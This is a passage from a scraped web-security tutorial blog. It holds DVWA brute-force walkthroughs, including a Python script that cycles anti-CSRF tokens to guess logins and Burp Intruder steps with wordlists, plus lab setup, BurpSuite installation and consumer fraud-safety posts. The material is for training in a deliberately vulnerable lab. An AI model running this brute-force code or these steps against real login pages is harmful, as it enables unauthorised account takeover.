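    request. Only the first request is accepted; the rest are redirected."""
    _, body = client.get({})
    stale = extract_token(body) or ""
    return [client.get({"username": username, "password": p,
                        "Login": "Login", "user_token": stale})[0]
            for p in passwords]


def brute_force(client, username: str, passwords: List[str]
                ) -> Tuple[Optional[str], List[Tuple[str, int]]]:
    """Sequential attack (the script equivalent of maximum concurrent requests = 1):
    each attempt's token comes from the previous response, like recursive grep.
    Returns the password that succeeded (or None) and a (password, status) log."""
    _, body = client.get({})                  # seed: initial payload for the first request
    token = extract_token(body)
    log: List[Tuple[str, int]] = []
    for candidate in passwords:
        status, body = client.get({"username": username, "password": candidate,
                                   "Login": "Login", "user_token": token or ""})
        log.append((candidate, status))
        if status != 200:                     # chain broke (e.g. a concurrent request); re-seed
            _, body = client.get({})
            token = extract_token(body)
            continue
        token = extract_token(body)           # next token from this response
        if SUCCESS_TEXT in body:
            return candidate, log
    return None, log


if __name__ == "__main__":
    wordlist = ["admin", "admin123", "password", "password123"]  # constructed sample
    print("cluster bomb statuses:", naive_cluster_bomb(FakeDvwa(), "admin", wordlist))
    print("pitchfork result:", brute_force(FakeDvwa(), "admin", wordlist))
```

Against a live instance, replace FakeDvwa with a thin wrapper around requests.Session whose get(params) calls session.get(url, params=params, allow_redirects=False) and returns (status_code, text): allow_redirects=False is what keeps the 302 visible, and the session must carry the PHPSESSID and security=high cookies from the browser session. The strictly sequential loop is the point; running the attempts in parallel reproduces the 302 failures of the first Intruder run.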
The fine-tuning worked!\nLet\u0026rsquo;s check the one with a different response length, \u0026ldquo;4792\u0026rdquo;, and yes, we found our credentials match (admin/password).\nThe \u0026ldquo;Grep - Match\u0026rdquo; flag can also be enabled so that the successful attempt is the only row without the \u0026ldquo;incorrect\u0026rdquo; flag.\nWell done!! 🎉\nThus, the Brute Force vulnerability still remains open: the anti-CSRF token only defeats naive automation, it does not limit the number of login attempts.\nWe have covered a lot of ground here to exploit the Brute Force attack. Re-visit the article and keep practicing until you become familiar with it.\nCheck out the below article to learn more about prevention techniques.\nDVWA - Brute Force Attack and Prevention Explained\n","date":"4 August 2022","externalUrl":null,"permalink":"/dvwa-brute-force-attack-high-severity/","section":"Posts","summary":"","title":"DVWA Brute Force Attack - High Severity","type":"posts"},{"content":"I hope you are familiar with brute-force attacks by now.\nIn the current section, we will explore a bit more about the Brute Force attack and the options available in the BurpSuite tool for effectively identifying successful brute-force attempts.\nIf you haven\u0026rsquo;t read the previous article about the Brute Force attack, feel free to refer to the bookmark below.\nDVWA - Brute Force Attack and Prevention Explained\nDVWA Brute Force Vulnerability - Demo # Imagine we found a vulnerability and reported it to the DVWA development team. The team came back claiming the security flaw was fixed.\nTrust but Verify\nIt is always good practice to re-verify and ensure that the vulnerability is mitigated as per best practices. Let\u0026rsquo;s verify.\nLog into the DVWA application. In the sidebar, scroll to the bottom of the page and click on \u0026ldquo;DVWA Security\u0026rdquo;. A page will load as shown below.\nFigure 1: Choosing DVWA Security Level to Medium Set the security level to \u0026ldquo;Medium\u0026rdquo; and click on the Submit button. 
Ensure it is updated and displayed on the left side at the bottom of the page.\nLaunch the BurpSuite tool, navigate to the \u0026ldquo;Proxy\u0026rdquo; tab, and click on the \u0026ldquo;Open Browser\u0026rdquo; button.\nVisit the DVWA application, select the \u0026ldquo;Brute Force\u0026rdquo; vulnerability, and then enter any random credentials as discussed in the previous article.\nEnable the intercept option and capture the login request, as shown below. Observe that the security parameter value is set to medium in line 16.\nFigure 2: Brute Force Login Request Medium Similar to the previous lesson, click on \u0026ldquo;Action\u0026rdquo; and select \u0026ldquo;Send to Intruder\u0026rdquo;. Set the attack type to \u0026ldquo;Cluster bomb\u0026rdquo;, clear all positions, and add only the username and password value fields for inserting custom payloads.\nFigure 3: The Intruder with a user authentication request For the current scenario, we will use the same word lists of common usernames and passwords. Save the text files onto your system or use copy-paste to load the information in the payloads tab.\nusernames.txt\nadmin\nadministrator\nuser\njohn\ndvwa\nbob\nalice\nroot\nsuperuser\nsuper\npasswords.txt\nadmin\nadmin123\npassword\npassword123\nuser\nuser123\nadministrator\npassw0rd\nr3m3mb3rM3\nadmin123$\nIn the \u0026ldquo;Payloads\u0026rdquo; sub-tab, select \u0026ldquo;Payload Set 1\u0026rdquo;, set the payload type to \u0026ldquo;Simple list\u0026rdquo;, and paste the contents of usernames.txt into the payload options. (For username values)\nNext, select \u0026ldquo;Payload Set 2\u0026rdquo;, set the payload type to \u0026ldquo;Simple list\u0026rdquo;, and paste the contents of passwords.txt into the payload options. 
(For password field values)\nFigure 4: Brute Force Attack - Intruder Payloads Set The steps are similar to the previous ones.\nIf you remember, in the previous Intruder attack summary, we needed to go through each request, select the response message, and look for the message \u0026ldquo;Username and/or password incorrect\u0026rdquo;.\nWe earlier used the \u0026ldquo;Length\u0026rdquo; column to drill down and focus on the one response with a different size.\nThe Intruder tool provides a better way to do this, called \u0026ldquo;Grep - Match\u0026rdquo;, which searches each HTTP response for a specific string and flags the result row. This is a more convenient way to view the results.\nIn the \u0026ldquo;Intruder\u0026rdquo; tab, click on the \u0026ldquo;Options\u0026rdquo; sub-tab, scroll down to \u0026ldquo;Grep - Match\u0026rdquo;, then click on the \u0026ldquo;Clear\u0026rdquo; button.\nFigure 5: Burp Suite Grep - Match If it prompts for confirmation, click on \u0026ldquo;Yes\u0026rdquo; to clear.\nFigure 6: Grep Match Clear Confirmation In \u0026ldquo;Grep - Match\u0026rdquo;, type \u0026ldquo;incorrect\u0026rdquo; in the text area and click on the \u0026ldquo;Add\u0026rdquo; button. This word is taken from the invalid credentials error message \u0026ldquo;Username and/or password incorrect\u0026rdquo;.\nFigure 7: Grep Match Custom String Make sure \u0026ldquo;Flag result items with responses matching these expressions\u0026rdquo; is enabled and confirm the \u0026ldquo;incorrect\u0026rdquo; string is added.\nFigure 8: Grep Match for \u0026ldquo;Incorrect\u0026rdquo; string The match type \u0026ldquo;Simple string\u0026rdquo; suffices for our current requirement.\nFinally, click on the \u0026ldquo;Start attack\u0026rdquo; button and let us verify whether the brute-force vulnerability is fixed or not.\nFigure 9: Intruder Start Attack A new window pops up, and the Intruder attack summary will be displayed. 
Now, an additional column named \u0026ldquo;incorrect\u0026rdquo; is added.\nYou can see that our grep match pattern is working, as the \u0026ldquo;incorrect\u0026rdquo; column is flagged for each failed request.\nFigure 10: Brute Force Attack Result If you observe closely, there is one problem. It is slow compared to the previous brute-force attack.\nIt seems the DVWA development team added a small delay, but it is still not stopping us from performing a Brute Force attack; it only adds a fixed cost per attempt.\nIt took more time than before, but we found a valid password match again using the brute-force attack.\nIt is the row where the \u0026ldquo;incorrect\u0026rdquo; flag is empty, i.e., admin/password, as displayed in the above screenshot.\nScroll down to the response body and observe the message \u0026ldquo;Welcome to the password protected area of admin\u0026rdquo;.\nYay!! The vulnerability still remains open. Let\u0026rsquo;s report it back to the DVWA dev team. 😄\nDVWA Informational (Optional) # We are testing this in DVWA, an intentionally vulnerable environment. The application also allows us to view the backend code for learning purposes.\nRemember, you might not have this option in real-world applications.\nNavigate to the \u0026ldquo;Brute Force\u0026rdquo; menu item in the sidebar. 
On the same page, click on the \u0026ldquo;View Source\u0026rdquo; button at the bottom of the page.\nFigure 11: Brute Force View Source A pop-up window will be loaded, and the code will be displayed.\nFigure 12: Brute Force Medium Source Code Observe that the application sleeps for 2 seconds before sending the response back to the client for every failed login. A fixed delay slows an attacker down but does not stop them, since attempts can still be run in parallel; account lockout, rate limiting per account and per source, and multi-factor authentication are the controls that actually bound the number of guesses.\nIn general, the vulnerability can be mitigated in many ways, but industry best practices should be adhered to.\n","date":"3 August 2022","externalUrl":null,"permalink":"/dvwa-brute-force-attack-medium-severity/","section":"Posts","summary":"","title":"DVWA Brute Force Attack - Medium Severity","type":"posts"},{"content":"If you\u0026rsquo;re interested in learning and practicing web application security skills but are not sure where to get started, this section will walk you through setting up a lab environment with the DVWA docker image, one of the most practical vulnerable applications for learning web application security skills.\nWhat is DVWA? # Damn Vulnerable Web App, or Damn Vulnerable Web Application (DVWA), is an intentionally vulnerable application designed for pen-testers and security experts to learn and test web application security in a legal environment. It is developed using PHP/MySQL and can be deployed easily on an Apache server.\nDVWA Git Repository\nDVWA can be installed in multiple ways, such as from the code on GitHub, via Vagrant, or as a Docker image.\nIt is recommended to host vulnerable applications in a host-only network so that an attacker cannot use them to compromise other systems on your network.\nYou can even view the source code or contribute to the DVWA project. It\u0026rsquo;s an open-source project.\nFor simplicity, we will be using our own systems and the pre-built DVWA docker image, which is publicly available, rather than setting up the whole stack ourselves. 
By running the DVWA docker container, we can save a lot of time and jump-start learning application security and penetration testing directly.\nRequirements # Docker installed \u0026amp; enabled on your Laptop/Desktop\nAny Operating System (OS): Linux/Windows/Mac\nI am a GNU/Linux user, so most of the commands you will see from here on will be based on Linux (Debian); similar commands apply to other Linux flavors like Ubuntu and to Mac with minor tweaks.\nFor Windows users, you can use either PowerShell or Git Bash, where similar commands can be executed, or the Windows Subsystem for Linux.\nVerify Docker Setup # docker --version Output:\nDocker version 20.10.17, build 100c701 If the output is similar to the above, docker is installed on your system and you are good to start.\nFor users who do not have docker installed, please visit the Get Docker page for installation.\nManage Docker as Non-Root Users (Linux-based OS Users) # For users who are using docker on Linux-based operating systems, we need to take one more step to ensure we can manage docker as a non-root user.\nAfter installing docker, create the docker group (if the installer did not) and add your user to it.\n$ sudo groupadd docker\n$ sudo usermod -aG docker $USER\nNow log out of the user account and log back in again to verify that you can manage docker instances as a non-root user.\n$ docker run hello-world Output:\nFigure 1: Docker Hello World Output The above output confirms that we can manage Docker without root privileges. Keep in mind that membership of the docker group is equivalent to root access on the host, since a member can start a container that mounts the host filesystem; only add accounts you would trust with root. More details can be found on the post-installation docker page below.\nFigure 2: Benefits of DVWA Benefits of Local DVWA Environment # Practice any time.\nAbility to test any customized payloads or exploits.\nIt can be used to test the effectiveness of Web Vulnerability Scanners or Automated Tools.\nIt can be used for Teaching.\nAbility to test custom security fixes. 
Running DVWA docker # I hope your Docker environment is configured so we can start working. Here, we will use the Docker image that has already been built and hosted on Docker Hub.\nDamn Vulnerable Web Application Docker Image: https://hub.docker.com/r/vulnerables/web-dvwa/\nCommand:\ndocker run --rm -it -p 80:80 vulnerables/web-dvwa The above command downloads the docker image the first time it is run and starts the container immediately afterwards, exposing it on port 80.\nIf port \u0026ldquo;80\u0026rdquo; is already used by some other service on your operating system, you can publish the container on a different host port (say 8443) by changing the -p value to -p 8443:80. The host port comes first and the container port (80, where DVWA listens) second, so -p 80:8443 would not work. To keep the vulnerable application off your LAN, bind it to loopback only with -p 127.0.0.1:80:80. Ensure the updated port is used in the URL while accessing the DVWA web application. To view it, open a browser and visit \u0026ldquo;http://localhost/\u0026rdquo; (or http://localhost:8443/ with the alternative port); you should see the page shown below:\nFigure 3: DVWA Login Page The container will keep printing the console logs of the operations being performed on the DVWA website for reference.\nStop the running Docker container at any time by pressing Ctrl - c in your console.\nDVWA Admin Password # Now log into the application using the username admin and the password password, navigate to Setup DVWA and click on the Create/Reset Database button.\nFigure 4: Setting up DVWA Figure 5: DVWA database creation We can observe that the database has been created with a users\u0026rsquo; table. Some sample data is also inserted into the tables for our testing purposes.\nDamn Vulnerable Web App Walkthrough: # Log into the DVWA application and observe that most of OWASP\u0026rsquo;s well-known vulnerabilities have been set up so you can get started. 
They are displayed as shown below.\n[Figure 6: DVWA Challenges Overview]\nOur practice lab environment is up and good to go.\nFrom the above screenshot, you can use DVWA to practice and get hands-on experience with known vulnerabilities, such as Brute Force, Command Injection, CSRF, XSS, etc.\nClick on any vulnerability in the left-side menu, and the application will load the vulnerable page. All pages simulate close-to-real application behavior and provide hints to help you narrow down and use the correct type of payload for exploitation.\nRemember that all our changes will be lost once you stop the DVWA Docker container, since it was started with --rm and has no persistent storage. You might need to repeat the above steps when you start it again. This is how the container is designed, and it also allows us to begin with a fresh environment without worrying about previous changes.\nThe Docker image needs some more tweaks, but we will do them when needed, based on the type of attack we are discussing.\nDVWA Security Levels # In the DVWA application, there are multiple levels to test any specific vulnerability, ranging from Low to Medium to High and Impossible.\n[Figure 7: DVWA Security Level]\nThese levels help you build skills by understanding each scenario. First, you learn about the attack itself. Then, you learn how broken fixes are implemented and how they can be bypassed. Lastly, you learn the best way to secure a particular functionality.\nThe DVWA security levels differ in older versions: in the old version, High was the good-practice fix.\nIt is recommended that you go step by step. I still use it today to test specific payloads before they are applied to real applications as part of security testing.\nDVWA View Source and View Help # The DVWA application is mainly designed as a learning platform for application security. It also allows us to view the backend code for learning purposes.\n💻 Remember, you might not have this option for real-world applications. 
This is for educational purposes only.\nNavigate to any vulnerability in the menu, say the \"Brute Force\" menu item in the sidebar. On the same page, click on the \"View Source\" button at the bottom.\nSimilarly, the \"View Help\" button or \"More Information\" section can be used as initial help if you get stuck somewhere.\n[Figure 8: DVWA View Source or Help Information]\nI hope the above information helps you get started with the Damn Vulnerable Web App Docker container.\nIf you want to learn about some basic web foundations before jumping into web security vulnerabilities, refer to the bookmarks below.\nSecurity Foundations: What is Web Application and How does it work? Discover the fundamentals of what a web application is, URLs, and popular web application architectures. Gain insights into the core concepts that drive the digital world forward. Begin your journey by establishing strong security foundations.\nSecurity Foundations: HTTP Basics Tutorial Uncover the fundamentals of HTTP in a beginner-friendly way. The HTTP Basics Tutorial is a guide for those new to information security or diving into web application security.\nFAQs # How do I log into the Damn Vulnerable Web App? # You can use the credentials username admin and password password.\n","date":"30 July 2022","externalUrl":null,"permalink":"/lab-setup-docker-dvwa/","section":"Posts","summary":"","title":"Lab Setup - Docker DVWA","type":"posts"},{"content":"BurpSuite is a tool specifically designed for application security testing. 
It is used for crawling websites, tampering with HTTP messages, identifying vulnerabilities, automating security testing, and many more built-in functions.\nWe will cover the sections of BurpSuite individually as we keep testing for security vulnerabilities.\nBurpSuite (owned by PortSwigger) offers three variants: a Community edition, a Professional edition, and an Enterprise edition. We will use the Community edition throughout the articles, which suffices for our requirements.\nBurp Suite can be found here: https://portswigger.net/burp/communitydownload.\nOnce you are familiar with security assessments and concepts, I would recommend going for the Professional edition, as it has many more benefits, like saving sessions, optimizing scans, scheduling assessments, etc.\nThe BurpSuite Professional edition saves a lot of time while performing real-world security assessments.\nOWASP ZAP is an alternative. You can use it, or keep using the BurpSuite Community edition, which has limitations but can help complete our work.\nBurpSuite Installation # Visit the BurpSuite download page and click the \"Go Straight to downloads\" section.\n[Figure 1: BurpSuite Community Download Page]\nMake sure you are downloading the Community version.\nI am using a Linux-based OS, therefore I choose the Linux (64-bit) version and click on the \"Download\" button.\nClick on \"Show Checksums\" after downloading. It is displayed as shown below.\n[Figure 2: Validate Checksums]\nUse md5sum or sha256sum from the command line to verify your download, and compare the result against the checksum shown on the download page:\n$ md5sum burpsuite_community_linux_v2022_7_1.sh\nc48c31aa69754adaf394a215dff0ecc5 burpsuite_community_linux_v2022_7_1.sh\nThis helps verify that the file you downloaded is indeed the PortSwigger release and has not been tampered with by any malicious users. Prefer the SHA-256 value where it is offered, since MD5 is no longer collision-resistant.\nThe installation is straightforward. Make the script executable using the chmod command. 
If you are using Kali Linux, BurpSuite comes pre-installed.\nchmod u+x burpsuite_community_linux_v2022_7_1.sh\nRun the executable and follow the instructions.\n./burpsuite_community_linux_v2022_7_1.sh\n[Figure 3: BurpSuite Installation Screen]\nSelect where you want to install BurpSuite and click on Next.\n[Figure 4: Choose Installation Directory]\nKeep the default location for the symlink and click on Next.\n[Figure 5: Selecting symlinks' default location]\nClick on \"Finish\" to complete the installation.\n[Figure 6: BurpSuite Installation Complete]\nStarting BurpSuite # Navigate through your system applications, look for the \"BurpSuite Community\" icon, and click to launch. It can also be started manually by going to the BurpSuite installation directory and running ./BurpSuiteCommunity.\n[Figure 7: BurpSuite Launch Screen]\nHere we can observe that the project-saving feature is limited to the Professional edition.\nSelect Temporary project and click the \"Next\" button to continue.\n[Figure 8: BurpSuite Configuration Screen]\nCustom configuration in BurpSuite gives you more control over how the tool must behave, what type of checks you want to enable by default, etc. We will cover this in the advanced section.\nLet's start with the BurpSuite defaults and click the \"Start Burp\" button.\nFinally, BurpSuite will launch and be displayed as shown below.\n[Figure 9: BurpSuite Tool]\nThe installation process is very similar on Mac and Windows operating systems, with minor changes.\nEnsure your BurpSuite is installed and running before continuing to the next section, the BurpSuite overview.\n","date":"28 July 2022","externalUrl":null,"permalink":"/burpsuite-installation/","section":"Posts","summary":"","title":"BurpSuite Installation","type":"posts"},{"content":"In this section, we shall cover the web and how it works. 
This will act as a foundation for identifying security vulnerabilities further down the posts.\nWhat is a web Application? # Web applications are programs designed to perform specific operations for users or other applications.\nExamples: reading news, watching videos, editing photos online, etc.\nAs users, we use web browsers like Chrome, Firefox, etc., to interact with web applications; our browsers perform numerous actions behind the scenes once we enter a domain in the URL bar.\n[Figure 1: Web Application Introduction]\nHave you ever wondered how different browsers handle all these functions, and why you get largely similar results in all web browsers?\nThe Internet Engineering Task Force (IETF) is a standards organization for the Internet and other technical standards.\nA standards body is an individual or group of engineers and computer scientists who publish the methods, behaviors, innovations, and standards for how the internet and internet-connected systems should work.\n*Request For Comments (RFC)*\nRFC: After lots of peer review and evaluation of each proposal, it is standardized, and each proposal is given a Request For Comments (RFC) number. Therefore, all applications developed to work with the internet must adhere to RFC standards.\nI recommend going through RFC documents whenever you want to learn further. This might help you uncover new security bugs.\nWhat is a URL? # URL is an acronym for Uniform Resource Locator. It's a type of web address that specifies the location of a specific resource on the internet.\nA URL consists of different components. Let's look at them in detail.\n[Figure 2: URL Components]\nProtocol - The scheme used to access the resource (e.g., http or https). Domain Name - A user-readable address pointing to an IP address on the internet. Port - The specific port used for communication (HTTP runs on port 80, and HTTPS runs on port 443). 
Path - The file or subdirectory structure on the server. Parameter - A named variable defined to pass values for processing. Value - The value assigned to a parameter; it can contain characters and numerics.\nHow does a URL work? # When you type a URL in your browser, the first request is sent to the Domain Name System (DNS). DNS looks up the IP address mapped to the given domain name and returns the IP information to the browser.\n[Figure 3: How DNS Works]\nNext, the browser uses the IP address received and initiates a TCP connection with the server. Once the server responds with confirmation, a valid channel is established and the two start exchanging requests and responses.\nWeb Application Architectures # Let's dig a bit deeper. All web applications and technologies are logically connected for client-server communication to ensure a better web experience.\nFrom here on, we will refer to all operations performed on the user side as the Client (e.g., web browsers, terminal, etc.) and the one that accepts our request and responds as the Server (e.g., Nginx, Apache, etc.).\nAs of today, web application architectures have become very complex. 
Let's start with the basics without worrying much, and you can build your expertise from here on.\nClient - Server Architecture (2-Tiered) #\n[Figure 4: Client Server Architecture]\nIn the case of two-tier client-server architecture, a web application is hosted on a single server that processes all the client's requests and responds back.\nClient - Server Architecture (3 - Tiered) #\n[Figure 5: Client Server - (3 - Tiered)]\nIn the case of three-tier client-server architecture, a web application is hosted on multiple servers, a web server and a database server: the web server takes a request from the client, fetches the necessary data from the database, formats it, and sends it back to the client that requested it.\nClient - Server (n-tier) #\n[Figure 6: Client Server - (n-tier) or Hybrid Architecture]\nIn the case of n-tier architecture, there can be any number of web and database servers, where all the traffic received from the client is routed to the server with less load. Most of today's applications are deployed similarly to the above architecture.\nTechnologies # Technologies are generally classified into two types:\nClient Side Technologies\nServer Side Technologies\nLet's check out some examples. You might already be familiar with some technologies.\n[Figure 7: Various Technologies]\nClient Side Technologies # Our browser understands HTML, CSS, and JavaScript whenever the server sends information using them. The browser renders and displays the content in a human-readable format, hiding all the complex code from the user's view.\nServer Side Technologies # In the screenshot above, we highlighted a few programming languages like Python, PHP, Golang, etc., but there are many more server-side technologies. 
These high-level programming languages run on the server, process data, and format the data into a form the client can understand.\nConclusion # I hope you have some idea about the web and its technologies by now.\nNext, refer to the HTTP basics, which are helpful for security assessments and are used by developers and administrators to understand what the server says and take action based on it.\n","date":"25 July 2022","externalUrl":null,"permalink":"/what-is-web-application-and-how-does-it-work/","section":"Posts","summary":"","title":"What is Web Application and How does it work?","type":"posts"},{"content":"Shopping online today is a great way to save time and money, but taking a few precautions to protect yourself from online fraud is essential.\nWhat is Online Fraud? # Online fraud is the act of stealing or attempting to steal money, information, or other valuable items by using the internet.\nStealing via the internet can be done in several ways, including breaking into accounts and websites, scamming people out of money, selling fake products, etc.\nIt is becoming increasingly common due to the widespread use of smartphones and computers to buy online for both personal and business requirements.\nHow do Attackers get an edge? # In terms of security, humans are as secure as the weakest link in the chain.\nComputer systems are designed to store, retrieve, and process information according to standards. Humans learn, think, process, and act differently based on our unique experiences and perceptions.\nSome of our routine habits make us less secure and cause mistakes that attackers exploit. 
For example, falling prey to get-rich-quick schemes, too-good-to-be-true offers, lottery winnings and free money, etc.\nAs detailed below, one can take basic precautionary measures to stay safe from cyberattacks.\nSome tips to avoid being a victim of online fraud # Use known Retail provider websites # Use search engines to find your favorite retail provider to shop online; this is better than clicking on links you received.\nSometimes we might need to use a new provider for various reasons. In those cases, reviewing the information is one of the most important things.\nFirstly, check in detail the vendor's office location, previous customers' feedback, and the reputation of the quality of its offerings.\nSecondly, watch out for poor spelling, flipped names, look-alike email addresses, and other information that attackers may use to trick you by making them look similar to the real thing.\nLastly, if you are not comfortable sharing your card details with the new vendor, a third-party portal like PayPal can be used for making payments at an added cost.\nVerify SSL is enabled and used (Lock Icon in the address bar) # An SSL/TLS connection encrypts your traffic and helps protect you from sniffing and snooping by unknown parties on the network.\nUse trusted Devices # Ensure you use a device like a laptop or a mobile device that is patched and updated continuously and free from all viruses.\nDouble-check details and Return Policies. # Make sure to verify the product details, version, model number, and price before and after receiving the purchase.\nEnsure your purchase is covered by warranty and know your options for returning the product if it is missing or damaged.\nNever give out additional personal information. # Provide only the details necessary for the transaction and delivery or courier. 
If something goes wrong, report it.\nNever give out sensitive information, such as bank account numbers and social security numbers, to anyone you do not know.\nUse a credit card instead of a debit card: # Using a credit card instead of a debit card can help protect you from unauthorized charges.\nCredit cards provide a safer way to spend money than debit cards. Credit cards have more robust fraud protection and are not connected directly to your bank account; funds are not withdrawn until the end of the month.\nThey also have spending limits and built-in fraud protections to help you avoid being scammed. In some cases, providers do offer refunds under certain circumstances.\nReport any suspicious behavior to your bank or the authorities: # If you experience suspicious behavior when shopping online, don't hesitate to contact your bank or the responsible authorities. Reporting any suspicious behavior can help protect you from future online fraud.\nCheck Statements Regularly # Monitor all your bank, credit card, and credit score statements regularly for anomalies.\nUse a VPN in case of Public Wi-Fi. # Public Wi-Fi networks are more prone to sniffing attacks. We may never know the motives of the other users sharing the same network. Using a trusted VPN for secure transactions and purchases, or using a reliable network like your home network, is recommended.\nAlso, keep an eye on your surroundings when keying in card details in public.\nStrong Passwords # Ensure you are using a strong password for your online shopping accounts, and it should not be a common one that you already use somewhere else.\nSkip the card and use your smartphone whenever possible. 
# You can try using apps like Google Pay and Apple Pay wherever applicable and avoid using the physical card.\nUse a trusted Browser # Ensure that your browser is the latest version and downloaded from official sources.\nA secure browser helps prevent tracking and snooping on your traffic and helps protect you from phishing schemes and other forms of online fraud (say Firefox, Chrome, etc.).\nBrowsers like Firefox have a handy add-on called \"Firefox Multi-Account Containers\" that provides a separate space for each activity, such as banking, personal, work, etc. It provides additional protection from cookie-stealing sites.\nBlock intruders and report abuse. # Received calls, emails, or messages about winning the lottery, packages you haven't ordered, or huge discounts from unknown senders? Ignore them or report them as spam.\nConclusion # It's always wise to protect yourself from fraud, primarily online. Be sure to check the details of any product you buy online, and never give out your personal information unless you know the other party well.\nEnjoy safe shopping online.\n","date":"2 July 2022","externalUrl":null,"permalink":"/tips-for-securing-your-online-shopping-experience/","section":"Posts","summary":"","title":"Tips for Securing your Online Shopping Experience","type":"posts"},{"content":"Credit and debit card data breaches happen more often than one might imagine. In 2020, the US alone reported 393,207 credit card frauds, a 44.7% increase compared to the previous year. The number would be larger if combined worldwide.\nData breaches can be a painful experience for users whose card was used for unauthorized purchases by attackers, or whose money has already been stolen from their bank accounts. 
Data breach victims are left with the daunting task of determining what to do next and whether they'll ever get their money back.\nHowever, with a little precaution, the impact of these security breaches can be reduced. It's important to know what to do in the event of a data breach to protect your loved ones. Here's what to do if you or your family suffer a credit or debit card data breach, as well as prevention tips.\nWhat is a Credit/Debit card data breach? # A credit or debit card data breach is when unauthorized individuals gain access to the personal information of credit or debit cardholders, such as their name, address, phone number, email address, card expiry date, PIN, and card number.\nThis can happen when a company's infrastructure is hacked, a retailer's point-of-sale system is compromised, or an individual's personal information is stolen in a data breach.\nHow does the breach happen? # Card data breaches can happen in several ways. One common way is when a company's infrastructure is hacked. This can include compromising a company's website, database servers, backup systems, etc. When these systems are compromised, cyber criminals can access customers' credit and debit card numbers.\nEven though organizations ensure strong security practices and strict compliance, missing any of the below can also result in a breach.\nWeak cryptography practices.\nWeak access control mechanisms that allow unauthorized persons to access internal data.\nMissing data retention policies and keeping sensitive personal data longer than needed.\nLack of a security awareness culture.\nUnpatched systems.\nA weak screening process for third-party vendors or contractors, etc.\nIn addition, card data breaches can also occur when individuals' personal information is stolen. 
This can happen through the compromise of the user's own devices or through the installation of malicious applications.\nWhat to do if your card data is compromised? # Verify the Source: # Firstly, the source from which you receive the information is one of the most important things. If you receive a call from someone claiming to be from your credit card company and they ask for personal information, hang up and call the number on the back of your card. Legitimate credit card companies will never ask for personal information over the phone.\nFrom Internet/News Portals: # If you have received the information from a news portal, contact your bank, credit card company, or retailer immediately and confirm whether any of your personal information and card details were compromised in the breach.\nNotification from authorized Bank or Retailer: # Have you been notified by a retailer or a bank about a card data breach? If yes, check with them about the specifics, such as what data was accessed in the breach, for example card numbers, expiration date, personal information, etc.\nGenerally, banks and retailers are proactive and will be the first to notify you about your data compromise. Some retailers also offer a free credit monitoring service for some time.\nIn addition to the steps mentioned above, you can take the following detailed measures to prevent further damage.\nHow to take care of your credit or debit card? #\nYou can freeze the card and ask for a replacement card. This will prevent any further fraudulent charges from being made.\nRequest that your card services provider place a fraud alert on your account.\nYou can also request that your bank freeze your account.\nMonitor your credit report and bank statements closely. Look out for fraudulent credit card purchases.\nFile a police report (if applicable, based on your province).\nUpdate passwords for all your affected accounts and ensure a unique one is used for each account. 
Watch out for phishing emails. If the cybercriminals have only some pieces of your card information, they will send phishing emails and make scam calls to get the remaining data from you. Make sure to contact a valid customer care number rather than one found in a spam email.\nNever give personal information to someone who initiates contact with you over the phone.\nSubscribe to transaction notifications, login alerts, etc. (if offered by the service provider).\nFile a complaint with the legal body (if applicable, based on your province).\nDo not share any OTPs with unknown callers.\nDo not click on any verification links that you were not expecting.\nWhat do attackers do once they've stolen my card details? # Cybercriminals can use the stolen data in several ways, depending on their needs and goals.\nThey could use the card data to make fraudulent purchases or to create fake cards that can be used for funding criminal activities.\nThey could also sell the information online to other criminals, who may use it to commit identity theft or other crimes.\nThe stolen data could also be used to steal money from the victim's bank account or to take out loans in their name.\nIn some cases, the cybercriminals may also attempt to blackmail the victim into paying them money in exchange for not releasing the stolen data to the public.\nConclusion # I hope the steps in this article have helped you secure your finances for personal safety.\nIf you're still feeling anxious, speaking with someone specializing in credit card fraud might be a good idea. They can help answer any questions or concerns arising from being caught up in a breach of information security at one's bank or other organization where one maintains an account.\nAll points mentioned in this article are the author's views. Please check with your authorized financial institution or your country's laws for more information. 
","date":"2 February 2022","externalUrl":null,"permalink":"/steps-to-take-if-your-credit-card-data-is-compromised/","section":"Posts","summary":"","title":"Steps to Take if Your Credit Card Data is Compromised","type":"posts"},{"content":"Password! Password! Password! Too many to remember, and tired of resetting your online accounts so often?\nOnline accounts always pose a risk of being hacked. Password breaches are becoming more frequent, and it's easy to be overwhelmed by the responsibility of protecting your passwords.\nPassword managers are one of the best ways to stay ahead of the problem.\nWhat is a Password Manager? # Password managers are one of the solutions for managing all your online account passwords in one place, reducing the stress of remembering them all. They even save a lot of effort and time in managing them. Let's understand this in detail.\nPassword managers help fill in user login forms with just a click, and you can be assured that all your information is correct, without typos. They include an encrypted vault for your passwords, making them an excellent tool for sharing one password/key with a team or family. They help generate strong and unique passwords of variable lengths for all your online accounts, which can be used directly. Password managers are even available on mobile devices if you want the convenience of access throughout your day. Some password managers can even detect whether your accounts are compromised in the latest breach and notify you to secure them immediately. For those who prioritize privacy over convenience, there are also self-hosted password managers so that no one has access to your data but you!\nFinally, password managers are easy to use, so give them a try!\nHow to get started? # There are many password managers on the market, both paid and self-hosted. 
Choose based on your requirements!\nSome popular online password managers include # LastPass, 1Password, Dashlane, Keeper, Google Password Manager, etc.\nSelf-Hosted Password Managers include # KeePassXC, Bitwarden, etc.\nThe password managers mentioned here are a small sample of the password managers you can select from, but they all can store passwords and other sensitive information in one secure place!\nThings to avoid while using Password Managers # You should avoid bad habits if you want to use a password manager successfully.\nReusing passwords # This is one of the biggest mistakes people make and the easiest way for someone to get into all your accounts.\nOne of the best ways to avoid password breaches is to ensure you're using a strong and unique password for each account, one that is used nowhere else. This helps ensure that if one of your accounts is compromised, your other accounts remain safe, so you don't have to worry about it.\nMake sure you're using a strong and unique password for your Password Manager as well.\nAvoid guessable passwords # Some of the most common, easily guessable passwords are abc123, qwerty, password123, etc. 
